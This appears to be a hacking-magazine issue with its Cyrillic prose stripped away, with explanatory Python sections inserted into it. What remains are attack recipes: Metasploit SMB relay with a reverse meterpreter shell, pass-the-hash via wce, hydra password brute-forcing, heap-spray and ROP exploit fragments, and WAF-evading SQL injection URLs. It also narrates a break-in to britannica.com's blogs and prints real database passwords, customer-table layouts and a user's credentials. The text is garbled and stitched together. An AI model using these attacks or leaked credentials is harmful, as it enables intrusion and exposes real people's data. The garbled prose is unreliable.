auxiliary/scanner/snmp/snmp_enum.
. SNMP


,
, MIB ( )
, (
snmp_enum).
, /.

/ Cisco, Windows-.
MIB' SNMP net-snmp.sourceforge.net, ,
, BT4..
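SNMP v1 and v2c put the community string into every datagram as a plain OCTET STRING, which is why `snmp_login` can brute-force it with nothing but UDP and why a sniffer on the path reads it for free. The following added example (not from the article, Metasploit or net-snmp) builds an SNMPv1 GetRequest for sysDescr.0 by hand, decodes the community string back out the way a passive sniffer would, and shows the brute-force loop with the network round-trip replaced by an injected function; the encoding follows RFC 1157, the candidate list is made up.

```python
"""Added example, not from the article or Metasploit: a by-hand SNMPv1
GetRequest encoder/decoder. It shows that the community string is a plain
OCTET STRING in every v1/v2c datagram, which is all snmp_login needs to
brute-force and all a sniffer needs to read. OID and constants per RFC 1157."""

SYSDESCR = "1.3.6.1.2.1.1.1.0"          # sysDescr.0, what snmp_enum reads first


def ber_len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, payload):
    return bytes([tag]) + ber_len(len(payload)) + payload


def ber_int(v):
    """Non-negative INTEGER; an extra leading 0x00 keeps the sign bit clear."""
    return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big"))


def ber_oid(dotted):
    parts = [int(p) for p in dotted.split(".")]
    out = bytearray([parts[0] * 40 + parts[1]])
    for p in parts[2:]:
        chunk = bytearray([p & 0x7F])
        p >>= 7
        while p:
            chunk.insert(0, 0x80 | (p & 0x7F))
            p >>= 7
        out += chunk
    return tlv(0x06, bytes(out))


def get_request(community, oid, request_id=1):
    """SNMPv1 message: SEQUENCE { version 0, community, GetRequest-PDU }."""
    varbinds = tlv(0x30, tlv(0x30, ber_oid(oid) + tlv(0x05, b"")))
    pdu = tlv(0xA0, ber_int(request_id) + ber_int(0) + ber_int(0) + varbinds)
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode()) + pdu)


def read_tlv(buf, pos):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def community_of(packet):
    """What a passive sniffer pulls out of any SNMPv1/v2c datagram."""
    tag, msg, _ = read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, version, pos = read_tlv(msg, 0)
    _, community, _ = read_tlv(msg, pos)
    return int.from_bytes(version, "big"), community.decode()


def brute_force(wordlist, device_accepts):
    """snmp_login in one loop: send a GetRequest per candidate and keep the
    first community the device answers. device_accepts stands in for the
    UDP round-trip (constructed here; a real one would socket.sendto port 161
    and wait for a GetResponse, tag 0xA2)."""
    for community in wordlist:
        if device_accepts(get_request(community, SYSDESCR)):
            return community
    return None
```

Version 3 is the only one that authenticates and optionally encrypts; the moment a device accepts v1/v2c with `public`/`private`, the whole MIB tree (routes, ARP cache, interface list, running processes on Windows hosts) is readable by anyone who can reach UDP 161.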

:
.

:
. ,
- , , . ,
?
... netcraft.com
.
, xakep.ru. xakep (. ). , ,
, .

:
- ;
? ;
[] - .

, xakep.ru
:

... xakep.ru +
*.xakep.ru

googl:
www.google.*.??

, IP- .

:
Windows.

:
, , (Safe Mode) -
, :). ,
, ( :)),
. :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot


. :
, .
. SafeBoot -

: Windows c Oracle
TNS-listener.

:
TNS-listener'.
Oracle 8/9. (
), . set_log' SMBRelay'.
, , .


?
() Minimal Network, ,

.
, , . ,
:).

, SMBRelay (, Metasploit):
use exploit/windows/smb/smb_relay
:
set PAYLOAD windows/meterpreter/reverse_tcp
smbrelay:
set RHOST IP_
back-connect :
set LHOST _IP
exploit

perl-, Oracle-
, SMB-relay.
./tnscmd.pl -h oracle_server_ip --rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=\\\\ip_smb_relay_server\\share)))"

: Nmap
Zenmap.

. Oracle (8/9), , ,
, ,
.
Oracle'
, . ,
.
- vimeo.com/5500931.

op, fp, ufp ,


, , .
s: (. ).
Zenmap'
. ,
.
GUI
1 000,
.

Nmap .
. , XML ( -oX) gnmap ( -oG).
greppable nmap, grep.

.
grep'
Zenmap
, .

Zenmap'.
: Zenmap GUI Nmap'.

.

, , . , Zenmap
XML-.
-,

. , ,

- ,

.
,
XML
.
, ,
.
.
IP-
.

:
OllyDBG.

:
,
, . , -
,
, .
. ,
,

,
. , :).
. .
.
OllyStepNSearch,
(blog.didierstevens.com/programs/ollystepnsearch).
, , ( F7) ,
. ,
, . . z



m0r0 m0r0@inbox.ru

Windows


. .
,
, , . ,
:
.
,

, . ,
.
-
AD. AD
, .
, . , .
AD. , , .
() . .
, , , . , , .
, ,
. , , -


, . , .
100%- .
,
. , , ,

. , , ,
, . ,
, ,
. ,
.
, .
exploit-db vupen, Canvas Core
Impact. . Metasploit
meterpreter .
, ?

,

.
,
cain . LM-
(, ),
.

.
, LM
, , , .
,
. ,
.
, .
? , , ,
. ( )
. ,
.
?
, ,
, ,
. , ,
Adm391. ,
, . ,
,
.
, (,
IP-), .

-.
john.ini john.ini.bak ( ) :
john.ini
[List.Rules:Wordlist]
$[0-9]
$[0-9] $[0-9]
$[0-9] $[0-9] $[0-9]


. : {0,1,2,3,4,5,6,7,8,9}.
.
pentest.wordlist
Adm

:



john-386.exe --wordlist=pentest.wordlist --rules --stdout > pentest.passes

. :
hydra -l <username> -P passwords.txt -m L 192.168.120.11 smbnt

L,
,
. ,
. , , .
.
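The three rules in the john.ini fragment above append one, two or three digits to every wordlist entry, so a base word such as Adm yields 1110 candidates including Adm391. The following added example (not John the Ripper's code) expands such `$[...]` rules the way `--rules --stdout` would, so the list hydra is about to replay can be inspected and sized first; only the append-class token is implemented, other rule commands are out of scope.

```python
"""Added example, not John the Ripper's code: expand the '$[...]' append rules
from the john.ini fragment above into the candidate list that --rules --stdout
would print. Only the append-character-class token is handled."""
import itertools
import re

RULES = ["$[0-9]", "$[0-9]$[0-9]", "$[0-9]$[0-9]$[0-9]"]   # the three rules above
TOKEN = re.compile(r"\$\[([^\]]+)\]")


def char_class(spec):
    """Expand '0-9', 'a-f' or a literal set such as '!@#' into its characters."""
    chars, i = [], 0
    while i < len(spec):
        if i + 2 < len(spec) and spec[i + 1] == "-":
            chars.extend(chr(c) for c in range(ord(spec[i]), ord(spec[i + 2]) + 1))
            i += 3
        else:
            chars.append(spec[i])
            i += 1
    return chars


def expand_rule(rule):
    """All suffixes one rule produces: the cartesian product of its classes."""
    classes = [char_class(c) for c in TOKEN.findall(rule)]
    return ["".join(p) for p in itertools.product(*classes)]


def candidates(word, rules=RULES):
    """word + every suffix of every rule, in john's order (rule by rule).
    The bare word is not included because no ':' (no-op) rule is listed."""
    out = []
    for rule in rules:
        out.extend(word + suffix for suffix in expand_rule(rule))
    return out


def candidate_count(words, rules=RULES):
    """Size of the list before it is thrown at a lockout-protected account."""
    per_word = sum(len(expand_rule(r)) for r in rules)
    return len(words) * per_word
```

The count matters more than it looks: a domain lockout threshold of five attempts turns the 1110 tries per account into a denial of service against the very administrators being targeted, which is why the text suggests watching the lockout policy before running hydra.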

. . , ,
,
.

? , ...
-? ,
.
, ,
,
.
: , ? .

.
Cached Domain Credentials.
, , LM NTLM .
, .
CachedLogonsCount HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon.

. ,
.
, Cain PWDumpX.
,
.

HTTP://WWW
links

LM-: en.wikipedia.org/wiki/LM_hash;
Windows: support.microsoft.com/kb/913485;
pokehashball: grutz.jingojango.net/exploits/pokehashball.html;
pass-the-hash: darknet.org.uk/2010/10/windows-credentialseditor-v1-0-list-addedit-logon-sessions;
Microsoft SMB Relay: microsoft.com/technet/security/bulletin/ms08-068.mspx;
SMB signing: support.microsoft.com/kb/887429;
SmbRelay3: htarasco.org/security/smbrelay.


Cain, Cracker
MS-Cache Hashes. , .
,
.
, , , ,
. , ,
. ,
, , ,
.
Extreme GPU Bruteforcer,
, , , .
-, .

! lamercomp pokehashball.

, .
. <Send>
.
pokehashball.
.
NTLM- LM-.
. (, ,
). NTLMv2-, , , .

. , .
: , 100% .
. , ,
:
, ,
!

, , ,
.
, ,
.
, , HTML Outlook IE.
IE .
, , . ,
, , . IE (
, Outlook) web-.
.
, ,
. web-,
.
pokehashball.
Ruby Metasploit.
, , Metasploit
RUBYLIB=C:\framework\msf3\lib.
Outlook Express. ,
Outlook ; .
Outlook Express , , . ?
HTML- :
Hacker,<br />m0r0 Corporation <img width=1 height=1
src="http://lamercomp:8088/d.gif" />

Outlook ,
,
.


, , .
.
, .
Single Sign-On. ,
, .
, Microsoft.
, ,
CRM . ,
, .
, ,
, LM NTLM. :
, ,
,
.
pass-the-hash. ,
. .
, .
, , ,
, . wce,
,
.

.
, .
,
.
.
,
:
wce.exe -r60 -o c:\temp\wce.log

-r60
60 .

LSASS. LocalSystem.
psexec -s. .
,
. .
,
, .
,
, .
, Microsoft
. , , . ,
, ,
wce, . ,
, .
, ,
LocalSystem (
), .
. , .
.
:
wce.bat
@echo off
c:\temp\wce.exe -o c:\wce.log

.
.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run.
, . ,


, , ,
. ,
c:\wce.log.

INFO

wce -s <username>:<domain>:<lmhash>:<nthash> -c cmd

, , ,
.
, , ,
LM- NTLM-,
. , ,
challenge,
.
SMB Relay.
Microsoft .
(, NT) - MS08-068. , .

.
SMB.
,
EnableSecuritySignature RequireSecuritySignature HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters. ,
Windows 2000 RequireSecuritySignature
,
.
.

smb_relay Metasploit.
, ,
smb_relay:

info

,
,
.
.



.

DVD
dvd

,

,

.

use windows/smb/smb_relay
set smbhost <ip- >
exploit



? . , , 445 SMB. , , . regedit TransportBindName HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
. .
! -
,
, meterpreter , . , ?
, ?
. : . meterpreter .

Help, I need somebody

. ,
. , ?
, . -
. ,
Metasploit , 445
, , .

, - .
,
, HTTP. web-

. SMB, , .
. , - . , Metasploit smb_relay
, SMB.


smbrelay3. , .
, :
smbrelay3.exe --ListForHTTPRequests --AlternativeSrcPort 8088 --SMBDestinationHost <lamercomp>

[+] *** Remote SmbRelay3 BindShell Service Running ***: (<IP>:8080),
8080.
net user .

,
, 9 10 :
!. ,
.
, , ,
.
, .
pass-the-hash
, . , .
, Microsoft ,
, .
: ,

. ,
][. z


, CISS Research Team, twitter.com/NTarakanov

Microsoft
: Windows (EnableEUDC),
,
, ,
.
, :
21- PoC, FTP-, IIS 7.5;
22- wooyun.org ActiveX' WMI Administrative
Tools;
27- , rgod, PoC Fax
Cover Page Editor;
4- metasploit
, POC2010;
5- Google Internet Explorer'e.
Security Research &
Defense, , Workaround
(CVE-2010-3970) ACL-
shimgvw.dll.
Microsoft ,
DoS only,
.
FTP(CVE-2010-3972): MS , ,
(0xFF ),
!
,
EIP.

, .
(Insecure Library Loading Backup Managere'e)
, Vista.
MDAC,

Pwn2Own. .


01


MICROSOFT DATA ACCESS
COMPONENTS

TARGETS: Windows XP, 2003, Vista, 2008, 7


BRIEF

Integer Overflow, , ,
heap'a CacheSize
ActiveX MSADO.
CacheSize RecordSet
,
. CacheSize
, ,
4, DWORD 4 :
msado.dll
.text:4DDFC348 lea   eax, ds:4[eax*4]        ; eax = CacheSize
.text:4DDFC34F push  eax
.text:4DDFC350 push  0A00000h
.text:4DDFC355 push  ?g_hHeapHandle@@3PAXA   ; void * g_hHeapHandle
.text:4DDFC35B call  ds:__imp__MpHeapAlloc

, ,
CacheSize 0x40000000, ,
, .
. -,
? XML Data
Island, , XML, html-, :

0x21212121 EIP :)



<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid1">
<Devices>
<Device>
<HereIsCouldBeAnyData />
</Device>
</Devices>
</XML>
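The whole bug is the one instruction `lea eax, [eax*4+4]` operating on a 32-bit register: with CacheSize = 0x40000000 the product wraps and MpHeapAlloc is asked for 4 bytes, after which every record-set operation that walks the cache writes past the allocation. The following added example (not MDAC's code and not the exploit) models that arithmetic and the bounds check that would have rejected the input; the four bytes per slot comes from the `*4` in the listing, the walk counts are illustrative.

```python
"""Added example, not MDAC's code and not the exploit: a model of the size
arithmetic in the msado.dll listing above (lea eax, [eax*4+4] on a 32-bit
register) next to the bounds check that would have rejected the input."""
MASK32 = 0xFFFFFFFF
SLOT = 4                       # the *4 in the lea: four bytes per cached record slot


def alloc_size_buggy(cache_size):
    """What MpHeapAlloc is asked for: the multiply wraps silently at 2**32."""
    return (cache_size * SLOT + 4) & MASK32


def is_safe(cache_size):
    """True when cache_size*4+4 fits in 32 bits without wrapping."""
    return 0 <= cache_size <= (MASK32 - 4) // SLOT


def alloc_size_checked(cache_size):
    """The check that was missing: reject before multiplying, not after."""
    if not is_safe(cache_size):
        raise OverflowError("CacheSize too large for a 32-bit size")
    return cache_size * SLOT + 4


def overrun_bytes(cache_size, slots_walked):
    """Bytes written past the (wrapped) allocation when the record set later
    walks slots_walked entries with MoveFirst/MoveNext and friends."""
    return max(0, slots_walked * SLOT + 4 - alloc_size_buggy(cache_size))
```

The same pattern, count times element size plus a header, is worth grepping for in any parser: the safe form divides instead of multiplying (`count <= (SIZE_MAX - header) / elem`), as `is_safe` does here.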

-, , -
? RecordSet:
MoveFirst, MoveNext . ,
, .

ASLR.
:
: ;
, heap'e,
2 0x00 ;
C++, DWORD -
.

, JavaScript
, 0x0000.
0x0000, 0x00010001. :
-
. ,
, :

function IncreaseRowCounter()
{
    if (GlobalRowCounter < 0x10120)
    {
        for (i = 0; i < 0x300; i++)
        {
            GlobalRowCounter++;
            localxmlid2.AddNew(["BBBB"], ["c"]);
            localxmlid2.Delete();
        }
        var percentcomplete = Math.round(GlobalRowCounter / 0x10120 * 100);
        document.getElementById('progressfaseone').innerText = percentcomplete + "%";
        window.setTimeout(IncreaseRowCounter, 100);
    }
}

, :
(
ASLR), DEP ROP-. Mso.dll
VirtualProtect,
, - Executable.
use-after-free (CVE-2010-1262)
ms10-035. , !
,
.
SOLUTION

ms11-002: microsoft.com/technet/security/Bulletin/MS11-002.mspx


- ATL- VirtualProtect

4,

02


MICROSOFT GRAPHICS RENDERING
ENGINE

TARGETS: Windows XP, 2003, Vista

BRIEF

Windows
. POC2010 &
,
! ,Explorer -, : ,
,
( , doc- pdf-)
, .

ConvertDIBSECTIONToThumbnail shimgvw.dll, , ,
CreateSizedDIBSECTION.
.text:5D0201F5 push  edx              ; int
.text:5D0201F6 push  ecx              ; int
.text:5D0201F7 push  [ebp+arg_8]      ; int
.text:5D0201FA push  esi              ; int
.text:5D0201FB push  ecx              ; HPALETTE
.text:5D0201FC push  eax              ; int
.text:5D0201FD lea   eax, [ebp+var_10]
.text:5D020200 push  eax              ; int
.text:5D020201 call  _CreateSizedDIBSECTION@28

CreateSizedDIBSECTION biClrUsed
(signed). :
.text:5D01FC2D loc_5D01FC2D:
.text:5D01FC2D cmp   ecx, 100h        ; ecx = biClrUsed
.text:5D01FC33 jg    loc_5D01FCF0     ; !!!
.text:5D01FC39 lea   esi, [edx+28h]
.text:5D01FC3C lea   edi, [ebp+var_430.bmiColors]
.text:5D01FC42 rep movsd              ; inline memcpy

, ecx ,
, , . ,
WebDav Internet Explorer.
: ,
.
Explorer.exe, Windows XP,
Explorer.exe DEP permanent. -
ROP- DEP,
SetProcessDEPPolicy VirtualAlloc c RWX .
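The defect in the listing is the signed `jg` after `cmp ecx, 100h`: a biClrUsed with the top bit set reads as a negative number, passes the "not more than 256 colours" check, and then `rep movsd` uses the same register as an unsigned count for the copy into the stack buffer. The following added example (not shimgvw.dll's code and not the exploit) packs a BITMAPINFOHEADER the way a .bmp carries it and runs the check both ways; the 256-entry bound is the `100h` from the listing, the header values are constructed.

```python
"""Added example, not shimgvw.dll's code and not the exploit: parse a
constructed BITMAPINFOHEADER and compare the signed 'cmp ecx,100h / jg' check
from CreateSizedDIBSECTION with the unsigned check it should have been."""
import struct

MAX_COLORS = 0x100       # the bound in the listing: bmiColors holds 256 RGBQUADs
CLR_USED_OFFSET = 32     # offset of biClrUsed inside the 40-byte header


def bitmapinfoheader(bi_clr_used, width=1, height=1, bit_count=8):
    """Pack a 40-byte little-endian BITMAPINFOHEADER (biSize .. biClrImportant)."""
    return struct.pack("<IiiHHIIiiII", 40, width, height, 1, bit_count,
                       0, 0, 0, 0, bi_clr_used & 0xFFFFFFFF, 0)


def bi_clr_used_from(header, signed):
    """Read biClrUsed as the compiler did (signed) or as the count really is (unsigned)."""
    fmt = "<i" if signed else "<I"
    return struct.unpack_from(fmt, header, CLR_USED_OFFSET)[0]


def passes_check(header, signed=True):
    """Mirror of 'cmp ecx,100h / jg': the copy proceeds unless value > 256.
    With signed=True a value such as 0xFFFFFFFF is -1 and sails through."""
    return not (bi_clr_used_from(header, signed) > MAX_COLORS)


def bytes_copied(header, signed=True):
    """rep movsd copies ecx dwords, and ecx is always unsigned for that purpose."""
    if not passes_check(header, signed):
        return 0
    return bi_clr_used_from(header, signed=False) * 4


def max_safe_palette_bytes():
    """What the bmiColors buffer can hold when the check is unsigned."""
    return MAX_COLORS * 4
```

A header with biClrUsed = 0xFFFFFFFF copies about 16 GiB in theory and crashes long before that in practice, which is the controlled crash the thumbnail view turns into EIP control with the ROP chain discussed next; the fix is a `ja` (unsigned) in place of the `jg`, or an explicit `value > 0 && value <= 256`.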

metasploit'a:
'imp_VirtualAlloc',                 # pointer to the IAT slot holding VirtualAlloc
'call [ecx] / pop ebp / ret 0x10',  # gadget: call through that pointer, then drop the 4 arguments
0,                                  # lpAddress = NULL (let the kernel choose)
0x1000,                             # dwSize = 4 KiB
0x3000,                             # flAllocationType = MEM_COMMIT | MEM_RESERVE
0x40,                               # flProtect = PAGE_EXECUTE_READWRITE (RWX)

SOLUTION

MS, Fixit-. DLL


: echo y| cacls %WINDIR%\SYSTEM32\shimgvw.dll /E /P everyone:N

03

AGNITUM OUTPOST SECURITY SUITE PRO

TARGETS:

Agnitum Outpost Security Suite Pro Agnitum, VBEngNT.sys

BRIEF

: HIPS-
, .
DLL . Handle
\\.\vbengnt Guest
ioctl-
,
. , ioctl-
, -
.
, dll 50 - 50.

,
. .
Ioctl \\.\vbengnt
.text:0002B850 ioctl_handler proc
.text:0002B850
.text:0002B850 Irp = dword ptr 8
.text:0002B850
.text:0002B850 push  esi
.text:0002B851 push  edi
.text:0002B852 mov   edi, [esp+8+Irp]
.text:0002B856 mov   eax, [edi+60h]
.text:0002B859 mov   ecx, [eax+4]
.text:0002B85C mov   esi, [eax+8]
.text:0002B85F mov   edx, [edi+0Ch]
.text:0002B862 mov   [esp+8+Irp], ecx
.text:0002B866 mov   dword ptr [edi+1Ch], 0
.text:0002B86D movzx ecx, byte ptr [eax]
.text:0002B870 sub   ecx, 0
.text:0002B873 jz    loc_2B97D
.text:0002B879 sub   ecx, 2
.text:0002B87C jz    loc_2B967
.text:0002B885 jz    short loc_2B8A0          ; ecx == 0x0E (IOCTL)

Ioctl- :
.text:0002B8A0 loc_2B8A0:
.text:0002B8A0 mov   eax, [eax+0Ch]
.text:0002B8A3 mov   ecx, eax                 ; eax = IoCtl
.text:0002B8A5 shr   ecx, 2
.text:0002B8A8 and   ecx, 0F00h
.text:0002B8AE cmp   ecx, 800h
.text:0002B8B4 jz    short loc_2B8CD
[..]
.text:0002B8CD loc_2B8CD:
.text:0002B8CD lea   ecx, [esp+8+Irp]
.text:0002B8D1 push  ecx
.text:0002B8D2 push  esi
.text:0002B8D3 push  edx
.text:0002B8D4 push  eax
.text:0002B8D5 call  vuln_function

0x0001DAA0 :
.text:0001DAA0 vuln_function proc near
.text:0001DAA0
.text:0001DAA0 arg_0 = dword ptr 4
.text:0001DAA0 arg_4 = dword ptr 8
.text:0001DAA0 arg_8 = dword ptr 0Ch
.text:0001DAA0 arg_C = dword ptr 10h
.text:0001DAA0
.text:0001DAA0 mov   eax, [esp+arg_0]
.text:0001DAA4 shr   eax, 2
.text:0001DAA7 push  edi
.text:0001DAA8 mov   edi, [esp+4+arg_C]
.text:0001DAAC mov   ecx, [edi]
.text:0001DAAE and   eax, 0FFh
.text:0001DAB3 cmp   eax, 32h
.text:0001DAB6 mov   dword ptr [edi], 0
.text:0001DABC jb    short loc_1DAC7
[..]
.text:0001DAC7 loc_1DAC7:
.text:0001DAC7 mov   edx, [esp+4+arg_8]
.text:0001DACB cmp   edx, dword_45418[eax*4]
.text:0001DAD2 jz    short loc_1DADD
[..]
.text:0001DAEB loc_1DAEB:
.text:0001DAEB cmp   eax, 31h                 ; switch 50 cases
.text:0001DAEE push  esi
.text:0001DAEF ja    loc_1E186                ; default
.text:0001DAEF                                ; jumptable 0001DAF5 case 3
.text:0001DAF5 jmp   ds:off_1E190[eax*4]
[..]
, ENGINE_XmlMsgEmpty :
.text:0001DBFC mov   esi, [esp+8+arg_4]
.text:0001DC00 mov   eax, [esi]               ; esi
.text:0001DC02 push  eax
.text:0001DC03 call  ENGINE_XmlMsgEmpty
[..]
.text:0001D200 ENGINE_XmlMsgEmpty proc near
.text:0001D200 arg_0 = dword ptr 4
.text:0001D200
.text:0001D200 push  esi
.text:0001D201 mov   esi, [esp+4+arg_0]
.text:0001D205 test  esi, esi
.text:0001D207 jnz   short loc_1D212
[..]
.text:0001D218 add   esi, 14h                 ; esi
.text:0001D21B push  esi
.text:0001D21C call  sub_37650
[..]
.text:00037650 sub_37650 proc near
.text:00037650 arg_0 = dword ptr 4
.text:00037650
.text:00037650 mov   eax, [esp+arg_0]
.text:00037654 mov   dword ptr [eax+14h], 0   ; 0x00000000
.text:0003765B mov   dword ptr [eax+20h], 1
.text:00037662 add   eax, 28h
.text:00037665 mov   [esp+arg_0], eax
.text:00037669 jmp   nullsub_1
.text:00037669 sub_37650 endp

SOLUTION


HIPS. z

Handle!

054
54

X 03 /146/ 2011


M4g icq 884888, snipper.ru


,
17681771 . 1995 ,
.

,
.

, ab
ovo, ,
britannica.com ( eb.com). ,
, Blog
britannica.com/blogs. ,
,
:
<meta name="generator" content="WordPress 2.2" />

, ,
:


, , .
, , : inurl:britannica.
com filetype:php.
, .

,
.
,
:
britannica.com/blogs/?author=[N] ([N] ID

INFO

info

WordPress


) .
ID, ,
:

,
:).
X-Tools WBF.Gold (wonted.ru/programms/
wbf-gold).
:
/ : http://www.
britannica.com/blogs/wp-login.php
: POST
Submit-: Name=wp-submit,
Value=Login
:
""=log, ""=pwd
: input type="password"


insidepro.com/rus/download.shtml

. - ,
mlevy
London :).
, .

, britannica.com/blogs/wp-admin , mlevy

,
Plugins.
,
akismet/akismet.php -.
.
(britannica.com/
blogs/?britan)
- (/apps/docs):



:
1.

.
2.



.
3.

(apache
)

.
4.
,



.

HTTP://WWW
links


: britannica.
com/blogs;

: britan nicaindia.com;
(-
- WSO:
, , ,
https://rdot.org/
):
forum/showthread.
php?t=1085.
/apps/docs/wordpress-blog-80/blogs/
wp-config.php:
define('DB_NAME', 'blogs'); // The name of the database
define('DB_USER', 'wordpress'); // Your MySQL username
define('DB_PASSWORD', 'gutenberg5!'); // ...and password
define('DB_HOST', 'blogs.db'); // 99% chance you won't need to change this value
/apps/docs/bindia/codelibrary/inc/connection.php:
$dbConn = pg_pconnect("host=bi.db port=5432 dbname=bi user=bi password=bi");

e-mail',
( ,
: ),
WSO -, PostgreSQL.

bi.db,
: postgres, ihop, bi, aasl, site,
ebtimeline, bil.
tbl_order_master, :
order_id
order_number
order_date
uid
order_status
bill_name
bill_address
bill_phone
bill_email
ship_name
ship_address
shipp_phone
shipping_chrages


:

britannicain.com (, , )
, bi Britannica India. ,
, ,
britannicaindia.com /apps/
docs/bindia .
britannicaindia.com
Encyclopaedia
Britannica ( CD/DVD),
.
, ,
,
ReverseIP- yougetsignal.
com/tools/web-sites-on-web-server:

, - .
, :).

tbl_register, 9 470 . : ,
-
( ,
).
:


SELECT username||chr(58)||password||chr(58)||email||chr(58)||address FROM tbl_register LIMIT 30 OFFSET 0.
britannicaindia.
com/registration.php
vinay_75a;13041974, , , .
,

:). ,
.

PostgreSQL
.
, bil users
:

, , - ReverseIP-.

,
, ,
.

-,
. ,
, -...
:). z



, Digital Security (twitter.com/asintsov)


, .
, ,
. , 0day-...

, , , . ,
.
. ,
. ,
, .
: DLL-Hijacking, ARP-POISONING, SMB
RELAY... ,
libc, LD_AUDIT (
). , .
.


. -
. .
. ,
.
, . ,
: ? ,
.
, , . ,
, .

CONFidene 2010(2):
, ,
: .
? ? ,
, ! ,
! ,
. - .
- . ,
/
. .
, , .
90%
. , ,
-
.
, ,
. ,
, ,
, , .
,
( , , ). ,
,
.
.
, , . NTLM,
.
,
, . ,
, ,
.
,
?
,
,
. ,
, ,
, ,
.
, , ,
. ,
, .

, , ,
. , .
: , ,
, ,
<>, , . : , , ,
,
.
, (
). , :
:
select logins, FIO from db;

, , :
select * from db;

. , , .

...



, db
, ,
.
, ,
? ...

OpenEdge

, , .
RDBMS Progress OpenEdge. ?
, :

PepsiCo
Coca-Cola
Johnson & Johnson
Lockheed Martin
McDonnell-Douglas
Sony
Danon
Mercedes-Benz
Ford Motor
Mazda Motor Corporation
Heineken
...

, , ,
:). . ,
sh2kerr ( Yandex)
. :


,
. sh2kerr ,
. ... ! . , , ,
, - .
,
. . : ?
, ?. ,
. ? ,
, . OpenEdge,
, .
.
, , , , .
. _Users, ,
Admin, ,
TCP- .
. ... ?
? OllyDbg.

What the heck?

, .
OllyDbg ImmunityDebugger
OpenEdge prowin32.exe. , . recv(), , ,
. ,
WS2_32.dll,


. :
-, Search for -> Name in all modules.

recv , recv WSOCK32.dll.
. <F9> (Run)
. recv.
, , (
prow32.dll) .
recv prow32.dll,
<F8>, , , recv (ESP+4 , ). <F8> <F9>,
. ,
:
(. ). <F9> ,
memmove, ,
,
.
, , :
CMP AL,BYTE PTR DS:[EDX]

. , - .
DLL' :).
. ,
, :

AL EDX, ( , ,
). , , ECX EDX
, .
prow32.dll dbut_stcomp().
,
. , 0.
, . ,
EAX dbut_stcomp.
, EAX , RETN EAX , ,
.
: , , ? ?
?
: , . - ?
: ? , !
: ... ,
XXX! , ?
: ! !
! , -!
: , !

ECX , AL ,
. , :
MOV AL,BYTE PTR DS:[ECX]

, ,
EAX JE JNE.
, , , :
prow32.1024653F. <F9> : ,
.
.
, , ,
...
, :

TEST EAX,EAX
JE SHORT prow32.1024653F
MOV ECX,DWORD PTR DS:[106D1FF4]
MOV EDX,DWORD PTR DS:[ECX+B0]
PUSH EDX
PUSH 2C6
CALL prow32.10026CA0 ;

, <F9>
.

: , , ? ?
?
: , . - ?
: ? 043 , 043!
: ... , ,
043...
: ! !
043 ...
: 043, ...!

, .
: , , ,
-. . n- .
:
. .

Kaspersky AV 1000day

, ,
.
.

, ,
. ,
aka GreenDog ( ...)



, ,
: ,
? Cain.
Oracle TNS (, , ),
Passwords -> SMB
, ,
X NTLM-
, - . Kasper.
,
( , SMB,
SMB2, Cain ).
?
, Google . , ,
.
,
. - ,
, ,
. , ,
. Kaspersky Administration
Kit 6/8 IP-. ,
ICMP-.
SMB,
, , . ,
NTLM-. ,
, ,
.
smb_relay- Metasploit,
Y .
Y NT AUTHORITY/SYSTEM.
, ?


1. Microsoft Active Directory.


2. Administration Kit.
3. Administration Kit IP-.
!


Windows-

.
,
,
. ,
, BackTrack,
smb_relay.
NTLM-
( X, ).
, Y
. Y NTLM-Response , X. X ,
.
smb_relay Y ,
, Y
, . , , , meterpreter. Y (
, , , ).
Windows,
(
).
NTLM .
. IP- +
(NTLM) .

,

. . ,
,
.
- ,
, .
, , +
, , .
may the force be with you... z


, Positive Technologies (devteev.blogspot.com)
, Positive Technologies (ptresearch.blogspot.com)
oxdef , (blog.oxdef.info)

HackQuest 2010


-,
Chaos Constructions 2010,
online SecurityLab.
HackQuest 2010 ,
, : webhacking, social engineering, reverse engineering .
-
. ()
() ,
:). ,
, HackQuest 2010 .

.

1:

.
,
MySQL
SQL (insert-based).
, mod_security
. SQL- :


$query = "INSERT INTO indexes (text,source) value ('".$_GET['text']."',".$_GET['action'].")";

,
:
http://172.16.0.2/search.php?action=0&text=1'/*!%2b(select+1+from(select+count(*),concat((select+user()+from+information_schema.tables+limit+0,1),0x3a,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)*/,0)--+

, -
. ?
1. /*!...sql-...*/, SQL-
mod_security, (. devteev.
blogspot.com/2009/10/sql-injection-waf.html).
2. + (%2b) ( . https://rdot.org/forum/showthread.php?t=60).
3.
(. qwazar.ru/?p=7):

SQL Injection
, SQL Injection
Local File Including

Remote File
Including
old-school
+limit+0,1),0x3a,floor(rand(0)*2))x+from+information_
schema.tables+group+by+x)a)*/,0)--+
...

admins.

Path Traversal
select 1 from(select count(*),concat((select
user()),0x3a,floor(rand(0)*2))x from information_
schema.tables group by x)a

4. SQL
,0),
. -,
+ ( HTTP GET- ).
,
. MySQL 5.x ,
information_schema,
. ,
SQL Injection
:
http://172.16.0.2/search.php?action=0&text=1'/*!%2
b(select+1+from(select+count(*),concat((select+tab
le_name+from+information_schema.tables+where+table_
schema!='information_schema'+and+table_schema!='mysql'

http://172.16.0.2/search.php?action=0&text=1'/*!%2b(select+1+from(select+count(*),concat((select+column_name+from+information_schema.columns+where+table_name='admins'+limit+1,1),0x3a,floor(rand(0)*2))x+from+information_schema.columns+group+by+x)a)*/,0)-+
